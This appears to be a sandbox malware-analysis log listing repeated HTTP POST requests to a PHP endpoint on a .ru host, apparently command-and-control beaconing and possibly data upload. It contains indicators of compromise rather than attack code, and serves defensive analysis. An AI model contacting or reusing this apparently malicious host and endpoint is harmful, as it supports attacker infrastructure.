                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 151876Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1260Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
